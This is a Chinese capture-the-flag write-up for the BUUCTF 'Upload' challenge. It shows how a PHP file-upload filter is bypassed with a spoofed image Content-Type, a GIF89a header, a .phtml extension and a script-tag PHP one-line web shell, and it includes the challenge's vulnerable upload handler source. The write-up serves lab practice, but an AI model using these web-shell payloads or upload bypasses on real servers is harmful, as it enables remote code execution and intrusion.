BUUCTF靶场13 --[极客大挑战 2019]Upload

mind

BUUCTF靶场13 --[极客大挑战 2019]Upload



直接上传一句话木马，显示no image

burp修改
Content-Type: image/gif

GIF89a<?php @eval($_POST['x']);?>

[Plain Text] 纯文本查看 复制代码

POST /upload_file.php HTTP/1.1
Content-Length: 310
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryf7HpKf5eD4kpm1D2
Accept-Encoding: gzip, deflate
Connection: close

------WebKitFormBoundaryf7HpKf5eD4kpm1D2
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif

GIF89a<?php @eval($_POST['x']);?>
------WebKitFormBoundaryf7HpKf5eD4kpm1D2

返回
NOT！php!

再修改文件后缀

后缀修改为pHp，也返回NOT！php!
直接修改为phtml，返回
NO! HACKER! your file included '<?' #HTML encoding '<?'
使用脚本模式的一句话木马

[JavaScript] 纯文本查看 复制代码

<script language="php"> @eval($_POST['x'])</script>

上传成功，返回“上传文件名: 1.pHtml”
试了一下直接在端口后面添加1.phtml是失败的，
http://0a920cb9-e7f8-4c3c-98d8-3 ... buuoj.cn:81/1.pHtml
改成
http://0a920cb9-e7f8-4c3c-98d8-3 ... n:81/upload/1.pHtml
链接成功，在根目录下面获取flag
flag{110f2373-2d3c-40b7-ad08-e286ad2dad70}

index.php

[HTML] 纯文本查看 复制代码

        <form action="upload_file.php" method="post" enctype="multipart/form-data">
            <div align="center">
                    <label for="file" style="font:20px Georgia,serif;">图片：</label>
                    <input type="file" name="file" id="file" >
                           <input type="submit" name="submit" value="提交" class="button">
                   </div>
        </form>

upload_file.php

[PHP] 纯文本查看 复制代码

<strong>
<?php
$file = $_FILES["file"];

// 允许上传的图片后缀
$allowedExts = array("php","php2","php3","php4","php5","pht","phtm");
$temp = explode(".", $file["name"]);
$extension = strtolower(end($temp));        // 获取文件后缀名
$image_type = @exif_imagetype($file["tmp_name"]);
if ((($file["type"] == "image/gif")
|| ($file["type"] == "image/jpeg")
|| ($file["type"] == "image/jpg")
|| ($file["type"] == "image/pjpeg")
|| ($file["type"] == "image/x-png")
|| ($file["type"] == "image/png"))
&&$file["size"] < 20480)    // 小于 20 kb
{
    if ($file["error"] > 0){

        echo "ERROR!!!";
    }
    elseif (in_array($extension, $allowedExts)) {
        echo "NOT！".$extension."!";
    }  
    elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) {
        echo "NO! HACKER! your file included '<?'";
    }
    elseif (!$image_type) {
        echo "Don't lie to me, it's not image at all!!!";
    }
    else{
        $fileName='./upload/'.$file['name'];
        move_uploaded_file($file['tmp_name'],$fileName); 
        echo "上传文件名: " . $file["name"] . "<br>";
    }
}
else
{
    echo "Not image!";
}
?>
</strong>